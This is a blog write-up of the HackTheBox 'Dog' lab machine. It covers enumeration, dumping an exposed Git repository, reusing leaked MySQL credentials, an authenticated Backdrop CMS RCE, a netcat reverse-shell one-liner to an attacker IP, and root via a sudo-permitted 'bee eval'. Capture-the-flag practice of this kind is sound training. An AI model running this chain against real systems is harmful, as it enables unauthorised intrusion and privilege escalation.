RobeeDS Logo

robeeds

Cybersecurity,  HackTheBox,  Privilege Escalation,  Linux

HackTheBox | Dog [Easy] Writeup

Author

robeeds

Date Published

HTB Dog Hero Image

Machine Information

IP Address: 10.10.11.58


Guide

Update hosts file

1vim /etc/hosts
Hosts File HTB Dog


Run Nmap Scan (Quick)

1sudo nmap -sS -sV 10.10.11.68 -stats-every=5s

Results

Nmap results HTB Dog


Visit Webpage

HTB Dog Landing Page

Run Ffuf to view directories

1ffuf -w /usr/share/wordlists/common.txt:FUZZ -u http://dog.htb/FUZZ -ic

Results

Ffuf results HTB Dog

There is an exposed Git Repository. This means that we will be able to view the site's history and development. Reference


Download Git-Dumper

1pipx install git-dumper

Run Git-Dumper on Dog

1git-dumper http://dog.htb/ git_dump

Cd into git_dump folder

1cd git_dump

Listing current directory

Git dump HTB Dog


There is a settings.php file, view contents

MySQL server password HTB Dog

Here we have some credentials to the root user of the MySQL server. 

1root:BackDropJ2024DS2024

Let's check the Git logs

1git log
Git log HTB Dog

Git checkout using the id.

Git checkout HTB Dog

Now, let's do a quick scan of any files that contain account information with the domain 'dog.htb'

Grep for domain users HTB Dog

We have more usernames and email accounts we could possibly use to log into the website.

Login Page HTB Dog

Trying Tiffany's email and the MySQL password lets us log into the dashboard

HTB Dog Dashboard

Checking User Accounts page

HTB Dog Users

Take a mental note of this for later. Continuing to look around for any important information

Backdrop Version HTB Dog

Let's see if there are any exploits we can run on this. 

1searchsploit backdrop
Searchsploit results for Backdrop HTB Dog

Let's go ahead and gather some more information about the exploit version that matches with the machine's Backdrop instance.


Remote Code Execution

After some light research, I came across this.

Summary of how this exploit works: An authenticated user that has permissions to upload modules manually can maliciously upload PHP code to establish a reverse shell, ultimately leading up to remote code execution.

We already have authenticated ourselves as Tiffany, and looking around further, there is a module upload page.

Module installation page HTB Dog

Before we continue, let's create our first attempt at exploiting this box.

Copy the Backdrop 1.27.1 Authenticated RCE exploit

1cp /usr/share/exploitdb/exploits/php/webapps/52021.py .

Run the Python script

1python 52021.py http://dog.
Exploit Output HTB Dog

The module was saved as a zip file, but we saw earlier that there wasn't a zip file extension installed. Let's see what file extensions are allowed.

From the browser, click on Manual Installation > Upload a module, theme, or layout archive to install.

It seems that tar, tgz, gz, and bz2 files are allowed. Let's go ahead and recompress the module to be uploaded. There will be a shell folder we will compress with the tar format. 

1tar -cf exploit.tar shell

Now, let's upload this file to the site, and visit its link.

Web page user shell HTB Dog

We have a reverse shell from the browser, but I'd like to make this a bit more stable. Let's open a listening port with netcat. In another terminal tab,

1nc -lvnp 6666

And in our "shell" in the browser,

1python3 -c 'import os; os.system("rm -f /tmp/f;mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP_HERE> 6666 >/tmp/f")'
Unstable Shell HTB Dog

This shell is still unstable, so let's go ahead and make our terminal experience more tolerable. Reference

Spawn a bash shell through Python

1python3 -c 'import pty; pty.spawn("/bin/bash")'

Set this to the background (Ctrl+z), then 

1stty raw -echo; fg

Lastly, set the $TERM variable to xterm

1export TERM=x

Now, we can see our pwd, clear our terminal, and use arrow keys.


One thing I like to do is to check the home directory

1ls -la /home
Home directory HTB Dog

There are two users, jobert and johncusack. Listing their directories shows me that user.txt exists under johncusack, but I can't seem to view the majority of files with cat.


Getting Stuck

I did some thorough investigation all around the file system, seeing if there was anything of use. I found that there was a utility called "Bee" under the root directory '/' (note that this is different compared to '/root'. Usage of Bee could be found here. I honestly got stuck here, running linpeas and continuing to look around for any ways to escalate my privileges. My last choice was just to reuse the MySQL password from earlier on some more of the accounts, which was successful.


Getting the User Flag

I SSH'ed into johncusack's account. 

1ssh johncusack@dog.htb

Now, we're able to view the User flag. 

1cat user.txt

Run sudo -l to view permissions

1sudo -l

Re-enter the MySQL password, and we see the following

Sudo permissions HTB Dog

Getting the Root Flag

We see that johncusack has the permission to run the Bee command as sudo, without a password. Having previously viewed its usage, can actually use this to spawn a shell as root. 

1sudo bee --root=/var/www/html eval 'system("/bin/bash");'
Root Shell HTB Dog

Now, we can view the directory and see the contents of root.txt

1cat /root/root.txt


Blog post fluffy writeup opengraph image
Cybersecurity,  HackTheBox,  Enumeration,  Privilege Escalation,  Active Directory ,  Windows

HackTheBox | Fluffy [Easy] Writeup

Fluffy is a Windows-based Active Directory machine on HackTheBox. This article will demonstrate basic Metasploit usage and privilege escalation.